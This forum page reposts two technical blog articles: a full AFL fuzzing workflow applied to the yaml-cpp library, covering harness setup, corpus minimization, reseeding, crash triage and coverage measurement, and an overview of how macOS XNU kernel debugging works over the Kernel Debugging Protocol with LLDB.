Posts posted by Nytro

  1. Fuzzing workflows; a fuzz job from start to finish

     

    Many people have garnered an interest in fuzzing in recent years, with easy-to-use frameworks like American Fuzzy Lop (AFL) showing incredible promise and a (relatively) low barrier to entry. Many websites give brief introductions to specific features of AFL and how to start fuzzing a given piece of software, but rarely cover what to do when you decide to stop fuzzing (or how to decide that in the first place).

    In this post, we’d like to go over a fuzz job from start to finish. What does this mean exactly? First, even finding a good piece of software to fuzz might seem daunting, but there are certain criteria you can follow to help decide what would be useful and easy to get started with. Once we have the software, what’s the best way to fuzz it? Which testcases should we seed with? How do we know how well we are doing, or which code paths we might be missing in the target software?

    We hope to cover all of this to give a full, 360-degree view of how to effectively and efficiently work through a complete fuzz job from start to finish. For ease of use, we will focus on the AFL framework.

    What should I fuzz? Finding the right software

    AFL works best on C or C++ applications, so this is immediately one criterion to look for in software we would like to fuzz. There are a few questions we can ask ourselves when looking for software to fuzz.

    1. Is there example code readily available?
      • Chances are, any utilities shipped with the project are too heavy-weight and can be trimmed down for fuzzing purposes. If a project has bare-bones example code, this makes our lives as fuzzers much easier.
    2. Can I compile it myself? (Is the build system sane?)
      • AFL works best when you are able to build the software from source. It does support instrumenting black-box binaries on the fly with QEMU, but this is out of scope and tends to have poor performance. In my ideal scenario, I can easily build the software with afl-clang-fast or afl-clang-fast++.
    3. Are there unique and interesting testcases easily available?
      • We are probably going to be fuzzing a file format (although with some tuning, we can fuzz networked applications), and having some testcases to seed with that are unique and interesting will give us a good start. If the project has unit tests with test cases of files (or keeps files with previously known bugs for regression testing), this is a huge win as well.

     

    These basic questions will help save a lot of time and headaches later if you are just starting out.

     

    The yaml-cpp project

    Ok, but how do you find the software to ask these questions about? One favorite place is Github, as you can easily search for projects that have been recently updated and are written in C or C++. For instance, searching Github for all C++ projects with more than 200 stars led us to a project that shows a lot of promise: yaml-cpp (https://github.com/jbeder/yaml-cpp). Let’s take a look at it with our three questions and see how easily we can get this fuzzing.

    1. Can I compile it myself?
      • yaml-cpp uses cmake as its build system. This looks great as we can define which compilers we want to use, and there is a good chance afl-clang-fast++ will Just Work™. One interesting note in the README of yaml-cpp is that it builds a static library by default, which is perfect for us, as we want to give AFL a statically compiled and instrumented binary to fuzz.
    2. Is there example code readily available?
      • In the util folder in the root of the project (https://github.com/jbeder/yaml-cpp/tree/master/util), there are a few small cpp files, which are bare-bones utilities demonstrating certain features of the yaml-cpp library. Of particular interest is the parse.cpp file. This parse.cpp file is perfect as it is already written to accept data from stdin and we can easily adapt it to use AFL’s persistent mode, which will give us a significant speed increase.
    3. Are there unique/interesting testcases easily available?
      • In the test folder in the root of the project is a file called specexamples.h, which has a very good number of unique and interesting YAML testcases, each of which seems to be exercising a specific piece of code in the yaml-cpp library. Again, this is perfect for us as fuzzers to seed with.

     

    This looks like it will be easy to get started with. Let’s do it.

     

    Starting the fuzz job

    We are not going to cover installing or setting up AFL, as we will assume that has already been done. We are also assuming that afl-clang-fast and afl-clang-fast++ have been built and installed as well. While afl-g++ should work without issues (though you won’t get to use the awesome persistent mode), afl-clang-fast++ is certainly preferred. Let’s grab the yaml-cpp codebase and build it with AFL.

     

    # git clone https://github.com/jbeder/yaml-cpp.git
    # cd yaml-cpp
    # mkdir build
    # cd build
    # cmake -DCMAKE_CXX_COMPILER=afl-clang-fast++ ..
    # make

    Once we know that everything builds successfully, we can make a few changes to some of the source code so that AFL can get a bit more speed. From the root of the project, in /util/parse.cpp, we can update the main() function using an AFL trick for persistent mode.

     

    int main(int argc, char** argv) {
      Params p = ParseArgs(argc, argv);
    
      if (argc > 1) {
        std::ifstream fin;
        fin.open(argv[1]);
        parse(fin);
      } else {
        parse(std::cin);
      }
    
      return 0;
    }

     

    With this simple main() method, we can update the else clause of the if statement to include a while loop and a special AFL function called __AFL_LOOP(), which allows AFL to basically perform the fuzzing of the binary in process through some memory wizardry, as opposed to starting up a new process for every new testcase we want to test. Let’s see what that would look like.

     

    if (argc > 1) {
      std::ifstream fin;
      fin.open(argv[1]);
      parse(fin);
    } else {
      while (__AFL_LOOP(1000)) {
        parse(std::cin);
      }
    }

     

    Note the new while loop in the else clause, where we pass 1000 to the __AFL_LOOP() function. This tells AFL to fuzz up to 1000 testcases in process before spinning up a new process to do the same. By specifying a larger or smaller number, you can trade a higher execution rate against memory usage (or being at the mercy of memory leaks), and this is highly tunable based on the application you are fuzzing. Adding code to enable persistent mode is not always this easy, either: some applications have architectures that don’t accommodate a simple while loop, due to resources spawned during start-up or other factors.
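    One practical detail worth sketching: __AFL_LOOP() only exists when the harness is built with afl-clang-fast++. A common guard (the fallback helper below is our own illustration, not an AFL API) keeps the same harness source buildable with a plain compiler by running the loop body exactly once:

```cpp
#include <cassert>
#include <iostream>
#include <iterator>
#include <sstream>
#include <string>

// __AFL_LOOP() is provided by afl-clang-fast's instrumentation and is
// undefined under an ordinary compiler. This fallback makes the while
// loop execute exactly once per process, so the same harness works both
// for fuzzing and for normal one-shot use.
#ifndef __AFL_LOOP
static bool afl_loop_fallback() {
    static bool ran = false;
    if (ran) return false;
    ran = true;
    return true;
}
#define __AFL_LOOP(count) afl_loop_fallback()
#endif

// Stand-in for the parse.cpp loop; returns how many iterations ran.
int fuzz_loop(std::istream& in) {
    int iterations = 0;
    while (__AFL_LOOP(1000)) {
        // Drain one testcase from the stream; a real harness would hand
        // this to yaml-cpp's parser here.
        std::string doc((std::istreambuf_iterator<char>(in)),
                        std::istreambuf_iterator<char>());
        (void)doc;
        ++iterations;
    }
    return iterations;
}
```

    Under afl-clang-fast++ the macro expands to AFL's real in-process loop; under g++ or clang++ the fallback simply runs once, which is handy for debugging the harness itself.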

    Let’s recompile now. Change back to the build directory in the yaml-cpp root, and type ‘make’ to rebuild parse.cpp.

     

    Testing the binary

    With the binary compiled, we can test it using a tool shipped with AFL called afl-showmap. The afl-showmap tool will run a given instrumented binary (passing any input received via stdin to the instrumented binary via stdin) and print a report of the feedback it sees during program execution.

     

    # afl-showmap -o /dev/null -- ~/parse < <(echo hi)
    afl-showmap 2.03b by <lcamtuf@google.com>
    [*] Executing '~/parse'...
    
    -- Program output begins --
    hi
    -- Program output ends --
    [+] Captured 1787 tuples in '/dev/null'.
    #

    By changing the input to something that should exercise new code paths, you should see the number of tuples reported at the end of the report grow or shrink.

     

    # afl-showmap -o /dev/null -- ~/parse < <(echo hi: blah)
    afl-showmap 2.03b by <lcamtuf@google.com>
    [*] Executing '~/parse'...
    
    -- Program output begins --
    hi: blah
    -- Program output ends --
    [+] Captured 2268 tuples in '/dev/null'.
    #

    As you can see, sending a simple YAML key (hi) expressed only 1787 tuples of feedback, but a YAML key with a value (hi: blah) expressed 2268 tuples of feedback. We should be good to go with the instrumented binary, now we need the testcases to seed our fuzzing with.

     

    Seeding with high quality test cases

    The testcases you initially seed your fuzzers with are one of, if not the, most significant factors in whether a fuzz run will come up with good crashes or not. As stated previously, the specexamples.h file in the yaml-cpp test directory has excellent test cases for us to start with, but they can be even better. For this job, I manually copied and pasted the examples from the header file into testcases, so to save the reader time, linked here are the original seed files I used, for reproduction purposes.

    AFL ships with two tools we can use to ensure that:

    • The files in the test corpus are as efficiently unique as possible
    • Each test file expresses its unique code paths as efficiently as possible

    The two tools, afl-cmin and afl-tmin, perform what is called minimizing. Without being too technical (this is a technical blog, right?), afl-cmin takes a given folder of potential test cases, runs each one, and compares the feedback it receives against the rest of the testcases to find those that most efficiently express the most unique code paths. The best testcases are saved to a new directory.

    The afl-tmin tool, on the other hand, works on a single specified file. When we are fuzzing, we don’t want to waste CPU cycles fiddling with bits and bytes that are useless relative to the code paths the testcase might express. In order to minimize each testcase to the bare minimum required to express the same code paths as the original, afl-tmin iterates over the actual bytes in the testcase, removing progressively smaller and smaller chunks of data until it has removed every byte that doesn’t affect the code paths taken. It’s a bit much, but these are very important steps to fuzzing efficiently and they are important concepts to understand. Let’s see an example.

    In the git repo I created with the raw testcases from the specexamples.h file, we can start with the file named 2.

     

    # afl-tmin -i 2 -o 2.min -- ~/parse
    afl-tmin 2.03b by <lcamtuf@google.com>
    
    [+] Read 80 bytes from '2'.
    [*] Performing dry run (mem limit = 50 MB, timeout = 1000 ms)...
    [+] Program terminates normally, minimizing in instrumented mode.
    [*] Stage #0: One-time block normalization...
    [+] Block normalization complete, 36 bytes replaced.
    [*] --- Pass #1 ---
    [*] Stage #1: Removing blocks of data...
    Block length = 8, remaining size = 80
    Block length = 4, remaining size = 80
    Block length = 2, remaining size = 76
    Block length = 1, remaining size = 76
    [+] Block removal complete, 6 bytes deleted.
    [*] Stage #2: Minimizing symbols (22 code points)...
    [+] Symbol minimization finished, 17 symbols (21 bytes) replaced.
    [*] Stage #3: Character minimization...
    [+] Character minimization done, 2 bytes replaced.
    [*] --- Pass #2 ---
    [*] Stage #1: Removing blocks of data...
    Block length = 4, remaining size = 74
    Block length = 2, remaining size = 74
    Block length = 1, remaining size = 74
    [+] Block removal complete, 0 bytes deleted.
    
    File size reduced by : 7.50% (to 74 bytes)
    Characters simplified : 79.73%
    Number of execs done : 221
    Fruitless execs : path=189 crash=0 hang=0
    
    [*] Writing output to '2.min'...
    [+] We're done here. Have a nice day!
    
    # cat 2
    hr: 65 # Home runs
    avg: 0.278 # Batting average
    rbi: 147 # Runs Batted In
    # cat 2.min
    00: 00 #00000
    000: 00000 #0000000000000000
    000: 000 #000000000000000
    #

     

    This is a great example of how powerful AFL is. AFL has no idea what YAML is or what its syntax looks like, but it was effectively able to zero out all the characters that weren’t special YAML characters used to denote key-value pairs. It was able to do this by determining that changing those specific characters would alter the feedback from the instrumented binary dramatically, and that they should be left alone. It also removed six bytes from the original file that didn’t affect the code paths taken, so those are six fewer bytes we will waste CPU cycles on.

    In order to quickly minimize a starting test corpus, I usually use a quick for loop to minimize each one to a new file with a special file extension of .min.

     

    # for i in *; do afl-tmin -i $i -o $i.min -- ~/parse; done;
    # mkdir ~/testcases && cp *.min ~/testcases

     

    This for loop will iterate over each file in the current directory, and minimize it with afl-tmin to a new file with the same name as the first, just with a .min appended to it. This way, I can just cp *.min to the folder I will use to seed AFL with.

     

    Starting the fuzzers

    This is the section where most of the fuzzing walkthroughs end, but I assure you, this is only the beginning! Now that we have a high quality set of testcases to seed AFL with, we can get started. Optionally, we could also take advantage of the dictionary token functionality to seed AFL with the YAML special characters to add a bit more potency, but I will leave that as an exercise to the reader.
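    For readers who want a head start on that exercise, here is a hypothetical sketch of what such a dictionary file could look like, in AFL’s name="token" dictionary format (the entry names are arbitrary labels of our choosing, not AFL keywords):

```
# yaml.dict -- hypothetical AFL dictionary of YAML syntax tokens
key_sep=": "
seq_entry="- "
doc_start="---"
doc_end="..."
comment="# "
anchor="&a"
alias="*a"
flow_seq="[]"
flow_map="{}"
literal_block="|"
folded_block=">"
```

    Passing such a file to afl-fuzz with the -x flag lets AFL splice whole YAML tokens into testcases, rather than having to rediscover them byte by byte.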

    AFL has two types of fuzzing strategies, one that is deterministic and one that is random and chaotic. When starting afl-fuzz instances, you can specify which type of strategy you would like that fuzz instance to follow. Generally speaking, you only need one deterministic (or master) fuzzer, but you can have as many random (or slave) fuzzers as your box can handle. If you have used AFL in the past and don’t know what this is talking about, you may have only run a single instance of afl-fuzz before. If no fuzzing strategy is specified, then the afl-fuzz instance will switch back and forth between each strategy.

     

    # screen afl-fuzz -i testcases/ -o syncdir/ -M fuzzer1 -- ./parse
    # screen afl-fuzz -i testcases/ -o syncdir/ -S fuzzer2 -- ./parse

     

    First, notice how we start each instance in a screen session. This allows us to connect and disconnect to the session running the fuzzer, so we don’t accidentally close the terminal running the afl-fuzz instance! Also note the arguments -M and -S used in each respective command. By passing -M fuzzer1 to afl-fuzz, I am telling it to be a Master fuzzer (use the deterministic strategy), with fuzzer1 as the name of the fuzz instance. On the other hand, -S fuzzer2 in the second command says to run that instance with the random, chaotic strategy, under the name fuzzer2. Both fuzzers will work together, passing new test cases back and forth as new code paths are found.

     

    When to stop and prune

    Once the fuzzers have run for a relatively extended period of time (I like to wait at the very least until the Master fuzzer has completed its first cycle; the Slave instances have usually completed many cycles by then), we shouldn’t just stop the job and start looking at the crashes. During fuzzing, AFL has hopefully created a huge corpus of new testcases that could still have bugs lurking in them. Instead of stopping and calling it a day, we should minimize this new corpus as much as possible, then reseed our fuzzers and let them run even more. This is the process that no walkthroughs talk about, because it is boring, tedious, and can take a long time, but it is crucial to highly effective fuzzing. Patience and hard work are virtues.

    Once the Master fuzzer for the yaml-cpp parse binary has completed its first cycle (it took about 10 hours for me; it might take 24 on an average workstation), we can go ahead and stop our afl-fuzz instances. We need to consolidate and minimize each instance’s queue and restart the fuzzing again. While running with multiple fuzzing instances, AFL maintains a separate sync directory for each fuzzer inside of the root syncdir you specify as an argument to afl-fuzz. Each individual fuzzer syncdir contains a queue directory with all of the test cases AFL was able to generate that lead to new code paths worth checking out.

    We need to consolidate each fuzz instance’s queue directory, as there will be a lot of overlap, then minimize this new body of test data.

     

    # cd ~/syncdir
    # ls
    fuzzer1 fuzzer2
    # mkdir queue_all
    # cp fuzzer*/queue/* queue_all/
    # afl-cmin -i queue_all/ -o queue_cmin -- ~/parse
    corpus minimization tool for afl-fuzz by <lcamtuf@google.com>
    
    [*] Testing the target binary...
    [+] OK, 884 tuples recorded.
    [*] Obtaining traces for input files in 'queue_all/'...
    Processing file 1159/1159... 
    [*] Sorting trace sets (this may take a while)...
    [+] Found 34373 unique tuples across 1159 files.
    [*] Finding best candidates for each tuple...
    Processing file 1159/1159... 
    [*] Sorting candidate list (be patient)...
    [*] Processing candidates and writing output files...
    Processing tuple 34373/34373... 
    [+] Narrowed down to 859 files, saved in 'queue_cmin'.

     

    Once we have run the generated queues through afl-cmin, we need to minimize each resulting file so that we don’t waste CPU cycles on bytes we don’t need. However, we have quite a few more files now than when we were just minimizing our starting testcases. A simple for loop for minimizing thousands of files could potentially take days and ain’t no one got time for that. Over time, I wrote a small bash script called afl-ptmin which parallelizes afl-tmin into a set number of processes and has proven to be a significant speed boost in minimizing.

     

    #!/bin/bash
    # afl-ptmin: run afl-tmin over a directory of testcases, $cores at a time.
    # Usage: afl-ptmin <cores> <inputdir> <outputdir>
    
    cores=$1
    inputdir=$2
    outputdir=$3
    pids=""
    total=`ls $inputdir | wc -l`
    
    # Walk the input directory $cores files at a time, minimizing each batch
    # in parallel and waiting for the whole batch before starting the next.
    for k in `seq 1 $cores $total`
    do
      for i in `seq 0 $(expr $cores - 1)`
      do
        # Pick the (i + k)-th file (smallest first) and minimize it in the background.
        file=`ls -Sr $inputdir | sed $(expr $i + $k)"q;d"`
        echo $file
        afl-tmin -i $inputdir/$file -o $outputdir/$file -- ~/parse &
      done
    
      wait
    done

     

    As with the afl-fuzz instances, I recommend running this in a screen session so that no network hiccups or closed terminals cause you pain and anguish. Its usage is simple, taking only three arguments: the number of processes to start, the directory with the testcases to minimize, and the output directory to write the minimized test cases to.

     

    # screen ~/afl-ptmin 8 ./queue_cmin/ ./queue/

     

    Even with parallelization, this process can still take a while (24 hours+). For our corpus generated with yaml-cpp, it should be able to finish in an hour or so. Once done, we should remove the previous queue directories from the individual fuzzer syncdirs, then copy the queue/ folder to replace the old queue folder.

     

    # rm -rf fuzzer1/queue
    # rm -rf fuzzer2/queue
    # cp -r queue/ fuzzer1/queue
    # cp -r queue/ fuzzer2/queue

    With the new minimized queues in place, we can begin fuzzing back where we left off.

     

    # cd ~
    # screen afl-fuzz -i- -o syncdir/ -S fuzzer2 -- ./parse
    # screen afl-fuzz -i- -o syncdir/ -M fuzzer1 -- ./parse

     

    Notice that instead of passing the -i argument a directory to read testcases from, as on previous afl-fuzz invocations, we simply pass a hyphen. This tells AFL to use the queue/ directory in that fuzzer’s syncdir as the seed directory and start back up from there.

    This entire process of starting the fuzz jobs, stopping to minimize the queues, and restarting can be repeated as many times as you feel necessary (usually until you get bored or just stop finding new code paths). It should also be done often, because otherwise you are wasting your electricity bill on bytes that aren’t going to pay you anything back later.

     

    Triaging your crashes

    Another traditionally tedious part of the fuzzing lifecycle has been triaging your findings. Luckily, some great tools have been written to help us with this.

    A great tool is crashwalk, by @rantyben (props!). It automates gdb and a special gdb plugin to quickly determine which crashes may lead to exploitable conditions. This isn’t foolproof by any means, but it does give you a head start on which crashes to focus on first. Installing it is relatively straightforward, but we need a few dependencies first.

     

    # apt-get install gdb golang
    # mkdir src
    # cd src
    # git clone https://github.com/jfoote/exploitable.git
    # cd && mkdir go
    # export GOPATH=~/go
    # go get -u github.com/bnagy/crashwalk/cmd/...

    With crashwalk installed in ~/go/bin/, we can automatically analyze the files and see if they might lead to exploitable bugs.

     

    # ~/go/bin/cwtriage -root syncdir/fuzzer1/crashes/ -match id -- ~/parse @@

     

    Determining your effectiveness and code coverage

    Finding crashes is great fun and all, but without being able to quantify how well you are exercising the available code paths in the binary, you are doing nothing but taking shots in the dark and hoping for a good result. By determining which parts of the code base you aren’t reaching, you can better tune your testcase seeds to hit the code you haven’t been able to yet.

    An excellent tool (developed by @michaelrash) called afl-cov can help you solve this exact problem by watching your fuzz directories as you find new paths and immediately running the testcase to find any new coverage of the codebase you may have hit. It accomplishes this using lcov, so we must actually recompile our parse binary with some special options before continuing.

     

    # cd ~/yaml-cpp/build/
    # rm -rf ./*
    # cmake -DCMAKE_CXX_FLAGS="-O0 -fprofile-arcs -ftest-coverage" \
    -DCMAKE_EXE_LINKER_FLAGS="-fprofile-arcs -ftest-coverage" ..
    # make
    # cp util/parse ~/parse_cov

     

    With this new parse binary, afl-cov can link the code paths taken in the binary for a given input back to the codebase on the file system.

     

    # screen afl-cov/afl-cov -d ~/syncdir/ --live --coverage-cmd "~/parse_cov AFL_FILE" --code-dir ~/yaml-cpp/ 

     

    Once finished, afl-cov generates report information in the root syncdir in a directory called cov. This includes HTML files, easily viewed in a web browser, detailing which functions and lines of code were hit, as well as which functions and lines of code were not hit.

     

    In the end

    In the three days it took to flesh this out, I found no potentially exploitable bugs in yaml-cpp. Does that mean that no bugs exist and it’s not worth fuzzing? Of course not. In our industry, I don’t believe we publish enough about our failures in bug hunting. Many people may not want to admit that they put a considerable amount of effort and time into something that came up as what others might consider fruitless. In the spirit of openness, linked below are all of the generated corpus (fully minimized), seeds, and code coverage results (~70% code coverage) so that someone else can take them and determine whether or not the fuzzing is worth pursuing further.

     

    https://github.com/bperryntt/yaml-fuzz

     

    Source: https://foxglovesecurity.com/2016/03/15/fuzzing-workflows-a-fuzz-job-from-start-to-finish/

  2. An overview of macOS kernel debugging

    Date: Tue 07 May 2019 | By: Francesco Cagnin | Category: macOS | Tags: macOS, XNU, kernel debugging

    This is the first of two blog posts about macOS kernel debugging. Here, we introduce what kernel debugging is, explain how it is implemented for the macOS kernel and discuss the limitations that come with it; in the second post, we will present our solution for a better macOS debugging experience.

    The terms macOS kernel, Darwin kernel and XNU are used interchangeably throughout the posts. References are provided for XNU 4903.221.2 from macOS 10.14.1, the latest available sources at the time of writing.

    What is a kernel debugger?

    Debugging is the process of finding and correcting software issues that may cause a program to misbehave. Faults include wrong results, program freezes or crashes, and sometimes even security vulnerabilities. To examine running applications, operating systems provide userland debuggers with mechanisms like ptrace or exception ports; but when working at the kernel/driver/OS level, more powerful capabilities are required.

    Modern operating systems like macOS or iOS consist of millions of lines of code, through which the kernel orchestrates the execution of hundreds of threads manipulating thousands of critical data structures. This complexity facilitates the introduction of likewise complex programming errors, which at minimum can cause the machine to stop or reboot. Even when kernel sources are available, tracing the root causes of such bugs is often very difficult, especially without knowing exactly which code has been executed or the state of registers and memory; similarly, the analysis of kernel rootkits and exploits of security vulnerabilities requires an accurate study of the behaviour of the machine.

    For these reasons, operating systems often implement a kernel debugger, usually composed of a simple agent running inside the kernel, which receives and executes debugging commands, and a complete debugger running on a remote machine, which sends commands to the kernel and displays the results. The debugging stub internal to the kernel generally has the tasks of:

    • reading and writing registers;
    • reading and writing memory;
    • single-stepping through the code;
    • catching CPU interrupts.

    With these capabilities, it also becomes possible to:

    • pause the kernel execution at specific virtual addresses, by patching the code with INT3 instructions and then waiting for type-3 interrupts to occur;
    • introspect kernel structures by parsing the kernel header and reading memory.
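    The INT3 mechanism from the first bullet can be sketched in a few lines. This is a purely illustrative model operating on a plain byte buffer, not real kernel code (an actual stub patches executable pages and then handles the resulting trap):

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// x86 single-byte breakpoint opcode; executing it raises a type-3 interrupt.
constexpr std::uint8_t INT3 = 0xCC;

struct Breakpoint {
    std::size_t  offset;  // where the patch was applied
    std::uint8_t saved;   // original byte, restored on removal
};

// Save the original byte and patch in INT3 (conceptually, what happens
// when the stub services a breakpoint-set request).
Breakpoint set_breakpoint(std::uint8_t* code, std::size_t offset) {
    Breakpoint bp{offset, code[offset]};
    code[offset] = INT3;
    return bp;
}

// Restore the original byte so execution can continue past the address.
void remove_breakpoint(std::uint8_t* code, const Breakpoint& bp) {
    code[bp.offset] = bp.saved;
}
```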

    The next sections describe in detail how kernel debugging is implemented by XNU.

    Debugging the macOS kernel

    As described in the kernel’s README, XNU supports remote (two-machine) debugging by implementing the Kernel Debugging Protocol (KDP). Apple’s documentation about the topic is outdated and no longer being updated, but luckily detailed guides [1][2][3] on how to set up recent macOS kernels for remote debugging are available on the Internet; summarising, it is required to switch to one of the debug builds of the kernel (released as part of the Kernel Debug Kit, or KDK), rebuild the kernel extension (kext) caches and set the debug boot-arg in the NVRAM to the appropriate values. After this, LLDB (or any other debugger supporting KDP) can attach to the kernel. Conveniently, it is also possible to debug a virtual machine instead of a second Mac [4][5][6].

    Mentioned for completeness, at least two other methods of kernel debugging have been supported at some point across several XNU releases. The archived Apple docs suggest using ddb over a serial line when debugging via KDP is not possible or is problematic (e.g., before the network hardware is initialised), but support for this feature seems to have been dropped after XNU 1699.26.8, as all related files were removed in the next release. Other documents, like the README of the Kernel Debug Kit for macOS 10.7.3 build 11D50, allude to the possibility of using /dev/kmem for limited self-debugging:

    ‘Live (single-machine) kernel debugging was introduced in Mac OS X Leopard. This allows limited introspection of the kernel on a currently-running system. This works using the normal kernel and the symbols in this Kernel Debug Kit by specifying kmem=1 in your boot-args; the DEBUG kernel is not required.’

    This method still works in recent macOS builds provided that System Integrity Protection (SIP) is disabled [7][8], but newer KDKs no longer mention it, and a note in the archived Apple docs says that support for /dev/kmem will be removed entirely in the future.

    The Kernel Debugging Protocol

    As already introduced, to make remote debugging possible XNU implements the Kernel Debugging Protocol, a client–server protocol over UDP that allows a debugger to send commands to the kernel and receive back results and exception notifications. The current revision of the protocol is the 12th, around since macOS 10.6 and XNU 1456.1.26.

    Like in typical communication protocols, KDP packets are composed of a common header (containing, among others: the request type; a flag for distinguishing between requests and replies; and a sequence number) and specialised bodies for the different types of requests, like KDP_READMEM64 and KDP_WRITEMEM64, KDP_READREGS and KDP_WRITEREGS, KDP_BREAKPOINT_SET and KDP_BREAKPOINT_REMOVE. As stated in most debug kits’ README, communications between the kernel and the external debugger may occur either via FireWire or Ethernet (with Thunderbolt adapters in case no such ports are available); Wi-Fi is not supported. The kernel listens for KDP connections only when:

    • it is a DEVELOPMENT or DEBUG build and the debug boot-arg has been set to DB_HALT, in which case the kernel stops after the initial startup waiting for a debugger to attach [9][10];
    • it is being run on a hypervisor, the debug boot-arg has been set to DB_NMI and a non-maskable interrupt (NMI) is triggered [11][12];
    • the debug boot-arg has been set to any value (even invalid ones) and a panic occurs [13][14].

    As might be expected, XNU assumes at most one KDP client is attached at any given time. With an initial KDP_CONNECT request, the debugger informs the kernel of the UDP port to which notifications should be sent back when exceptions occur. The interested reader can have an in-depth look at the full KDP implementation, starting from osfmk/kdp/kdp_protocol.h and osfmk/kdp/kdp_udp.c.
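    To make the packet layout described above concrete, here is a paraphrased sketch of the common KDP header (the authoritative definition lives in osfmk/kdp/kdp_protocol.h; the field names and bit widths below follow the description above but should be treated as illustrative rather than copied from Apple's sources):

```cpp
#include <cassert>
#include <cstdint>

// Illustrative paraphrase of the common KDP packet header: a request
// type, a request/reply flag and a sequence number, followed by the
// packet length and a session key.
struct kdp_header {
    std::uint32_t request  : 7;   // request type, e.g. KDP_READMEM64
    std::uint32_t is_reply : 1;   // distinguishes requests from replies
    std::uint32_t seq      : 8;   // sequence number matched across the link
    std::uint32_t len      : 16;  // total packet length in bytes
    std::uint32_t key;            // session key set up at KDP_CONNECT time
};

static_assert(sizeof(kdp_header) == 8,
              "bit-fields pack into one 32-bit word, plus the 32-bit key");
```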

    Detailed account of kernel-debugger interactions over KDP

    For the even more curious, this section documents thoroughly what happens when LLDB attaches to XNU via KDP; reading it is not required to follow the rest of the post. References are provided for LLDB 8.0.0.

    Assuming that the kernel has been properly set up for debugging and the debug boot-arg has been set to DB_HALT, at some point during the XNU startup an IOKernelDebugger object will call kdp_register_send_receive() [15]. This routine, after parsing the debug boot-arg, executes kdp_call() [16][17] to generate an EXC_BREAKPOINT trap [18], which in turn triggers the execution of trap_from_kernel() [19], kernel_trap() [20] and kdp_i386_trap() [21][22][23]. This last function calls handle_debugger_trap() [24][25] and eventually kdp_raise_exception() [26][27] to start kdp_debugger_loop() [28][29]. Since no debugger is connected (yet), the kernel stops at kdp_connection_wait() [30][31], printing the string ‘Waiting for remote debugger connection.[32] and then waiting to receive a KDP_REATTACH request followed by a KDP_CONNECT [33].

    In LLDB, the kdp-remote plug-in handles the logic for connecting to a remote KDP server. When the kdp-remote command is executed by the user, LLDB initiates the connection to the specified target by executing ProcessKDP::DoConnectRemote() [34], which sends in sequence the two initial requests KDP_REATTACH [35][36] and KDP_CONNECT [37][38].

    Upon receiving the two requests, kdp_connection_wait() terminates [39][40] and kdp_handler() is entered [41][42]. Here, requests from the client are received [43], processed using a dispatch table [44][45] and responded to [46] in a loop, until either a KDP_RESUMECPUS or a KDP_DISCONNECT request is received [47][48].

    Once the initial handshake is completed, LLDB sends three more requests (KDP_VERSION [49][50], KDP_HOSTINFO [51][52] and KDP_KERNELVERSION [53][54]) to extract information about the debuggee. If the kernel version string (an example is ‘Darwin Kernel Version 16.0.0: Mon Aug 29 17:56:21 PDT 2016; root:xnu-3789.1.32~3/DEVELOPMENT_X86_64; UUID=3EC0A137-B163-3D46-A23B-BCC07B747D72; stext=0xffffff800e000000’) is recognised as coming from a Darwin kernel [55][56], the darwin-kernel dynamic loader plug-in is selected. At this point, the connection to the remote target is established and the attach phase is completed [57][58] by eventually instantiating said plug-in [59][60], which tries to locate the kernel load address [61][62] and the kernel image [63][64]. Finally, the Darwin kernel module is loaded [65][66][67][68]: it first searches the local file system for an on-disk copy of the kernel using its UUID [69][70] and then eventually loads all kernel extensions [71][72].

    After attaching, LLDB waits for commands from the user, which will be translated into KDP requests and sent to the kernel:

    • commands register read and register write generate KDP_READREGS [73] and KDP_WRITEREGS [74] requests;
    • commands memory read and memory write generate KDP_READMEM [75] and KDP_WRITEMEM [76] requests (respectively KDP_READMEM64 and KDP_WRITEMEM64 for 64-bit targets);
    • commands breakpoint set and breakpoint delete generate KDP_BREAKPOINT_SET and KDP_BREAKPOINT_REMOVE [77] requests (respectively KDP_BREAKPOINT_SET64 and KDP_BREAKPOINT_REMOVE64 for 64-bit targets);
    • commands continue and step both generate KDP_RESUMECPUS [78] requests; in case of single-stepping, the TRACE bit of the RFLAGS register is set [79][80][81] with a KDP_WRITEREGS request before resuming, which later causes a type-1 interrupt to be raised by the CPU after the next instruction is executed.

    Upon receiving a KDP_RESUMECPUS request, kdp_handler() and kdp_debugger_loop() terminate [82][83][84] and the machine resumes its execution. When the CPU hits a breakpoint a trap is generated, and starting from trap_from_kernel() a new call to kdp_debugger_loop() is made (as discussed above). Since this time the debugger is connected, a KDP_EXCEPTION notification is generated [85][86] to inform the debugger about the event. After this, kdp_handler() [87] is executed again and the kernel is ready to receive new commands.
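    For reference, every KDP request and reply starts with a compact 8-byte header. The following sketch encodes one in JavaScript; the field layout is assumed from the kdp_hdr_t definition in osfmk/kdp/kdp_protocol.h, and the byte order is an assumption as well, so verify against the actual headers before relying on it:

```javascript
// Illustrative encoder for the 8-byte KDP packet header. The field layout
// (request:7 bits | is_reply:1 bit, seq:8, len:16, key:32) is assumed from
// osfmk/kdp/kdp_protocol.h; request codes and endianness are assumptions,
// not verified values.
function encodeKdpHeader({ request, isReply, seq, len, key }) {
  const view = new DataView(new ArrayBuffer(8));
  view.setUint8(0, (request & 0x7f) | (isReply ? 0x80 : 0)); // request + reply bit
  view.setUint8(1, seq & 0xff);                              // sequence number
  view.setUint16(2, len, true);                              // total packet length
  view.setUint32(4, key, true);                              // session key
  return new Uint8Array(view.buffer);
}
```

    Under these assumptions, the KDP_REATTACH/KDP_CONNECT handshake would simply be two such headers (each followed by a request-specific body) sent over UDP to the debuggee.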

    The Kernel Debug Kit

    For some macOS releases, Apple also publishes the related Kernel Debug Kits, containing:

    • the RELEASE, KASAN (only occasionally), DEVELOPMENT and DEBUG builds of the kernel, the last two compiled with ‘additional assertions and error checking’;
    • symbols and debugging information in DWARF format, for each of the kernel builds and some Apple kexts included in macOS;
    • the lldbmacros, a set of additional LLDB commands for Darwin kernels.

    KDKs are incredibly valuable for kernel debugging, but unfortunately they are not made available for all XNU builds and are often published weeks or months after them. Searching the Apple Developer Portal for the non-beta builds of macOS 10.14 as an example, at the time of writing only three of the nine builds (18A391, 18C54 and 18E226) had a KDK released on the same day as the respective macOS release; one KDK was released two weeks late (18B75); and no KDK was released for the other five builds (18B2107, 18B3094, 18D42, 18D43, 18D109). From a post on the Apple Developer Forums it appears that nowadays ‘the correct way to request a new KDK is to file a bug asking for it.’

    lldbmacros

